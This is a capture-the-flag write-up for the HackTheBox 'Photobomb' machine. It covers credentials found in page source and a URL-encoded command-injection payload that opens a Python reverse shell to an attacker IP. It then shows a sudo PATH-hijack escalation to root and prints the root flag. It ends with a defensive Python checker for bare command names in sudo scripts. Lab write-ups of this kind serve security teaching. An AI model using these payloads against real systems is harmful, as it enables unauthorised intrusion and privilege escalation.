Make sure to connect to the HackTheBox VPN before you start.
1. nmap scan, directory and subdomain enumeration first
Open ports:
22 - ssh
80 - http
2. Let's enumerate HTTP
Make sure to add photobomb.htb to your /etc/hosts file.
3. On inspecting the source code we found something interesting:
http://pH0t0:b0Mb!@photobomb.htb/printer
This looks like a username and password: pH0t0:b0Mb!
4. Let's try to log in with these credentials
We are logged in :)
But nothing here looks interesting.
5. Let's intercept the request with Burp
If you test each parameter with command execution payloads, you'll find that the filetype parameter is injectable, which can be used to get a reverse shell.
6. Start a netcat listener and use the payload
The payload to inject into the filetype parameter is shown below. Replace the IP address and port with the ones your netcat listener uses.
%3bexport+RHOST%3d"10.10.14.35"%3bexport+RPORT%3d2929%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'
7. Send the request with the payload in the filetype parameter
8. We got the reverse connection. Before we go on, let's upgrade to an interactive shell with the command below:
python3 -c "import pty;pty.spawn('/bin/bash')"
9. Now let's try to escalate privileges from this session to root
We can use linpeas to look for a way to escalate.
Linpeas is a popular tool used to search for possible paths to escalate privileges on Linux, Unix, and macOS hosts.
It seems we can run cleanup.sh with root permissions. So let's view the contents of cleanup.sh for any possibility of gaining root privileges:
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
The script calls find by bare name, so it is resolved through PATH, and sudo lets us supply our own PATH.
10. Let's write "bash" into a file named find, make it executable, and run cleanup.sh with root permissions and our directory first in PATH:
wizard@photobomb:~/photobomb$ echo bash > find
wizard@photobomb:~/photobomb$ chmod +x find
wizard@photobomb:~/photobomb$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# cat /root/root.txt
17efb291c8f2de7f3feae82386cb07c4
Flag: 17efb291c8f2de7f3feae82386cb07c4
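The root cause above is a script run under sudo that invokes find and chown by bare name, so a caller who controls PATH picks what actually runs. As an added example (not part of the writeup or the box), the Python check below flags such bare command words in a constructed copy of cleanup.sh and shows that a hardened version with a pinned PATH and absolute paths is clean. The keyword and builtin sets are an assumption that covers common bash scripts, not a full shell parser.

```python
import shlex

# Constructed copy of /opt/cleanup.sh as shown above (with straight quotes).
VULNERABLE = r"""#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
    /bin/cat log/photobomb.log > log/photobomb.log.old
    /usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
"""
# Suggested fix: pin PATH (sudo let the caller override it here) and use absolute paths.
HARDENED = (VULNERABLE
            .replace("#!/bin/bash\n", "#!/bin/bash\nPATH=/usr/sbin:/usr/bin:/sbin:/bin\n")
            .replace("\nfind ", "\n/usr/bin/find ")
            .replace("-exec chown", "-exec /usr/bin/chown"))

# Keywords and builtins resolve without a PATH lookup, so they cannot be hijacked (assumed set).
KEYWORDS = {"if", "then", "else", "elif", "fi", "for", "while", "until", "do", "done",
            "case", "esac", "in", "!", "{", "}", "&&", "||", ";", "|"}
BUILTINS = {"[", "[[", ".", "source", "cd", "export", "exit", "return", "set", "shift",
            "test", "echo", "printf", "read", "unset"}
# Words after which the next word is again a command (find -exec, xargs, sudo, env).
COMMAND_FOLLOWS = {"-exec", "-execdir", "xargs", "sudo", "env", "nohup"}

def unqualified_commands(script: str) -> list[str]:
    """Return command words the script invokes by bare name (PATH lookup), in order."""
    found = []
    for line in script.splitlines():
        try:
            words = shlex.split(line, comments=True)  # drops '# ...', resolves quotes and \;
        except ValueError:
            continue  # unbalanced quote: line is not parseable on its own, skip it
        expect_command = True
        for word in words:
            if word in KEYWORDS:               # a keyword is followed by a new command
                expect_command = True
            elif expect_command and "=" in word and not word.startswith("="):
                pass                           # VAR=value prefix; the command still follows
            elif expect_command:
                if word not in BUILTINS and not word.startswith("/"):
                    found.append(word)
                expect_command = word in COMMAND_FOLLOWS
            elif word in COMMAND_FOLLOWS:
                expect_command = True
    return found
```

On the cleanup.sh copy this returns ['find', 'chown']; on the hardened version it returns []. Pinning PATH inside the script is defense in depth; the sudoers rule allowing the caller to set environment variables is the other thing to review.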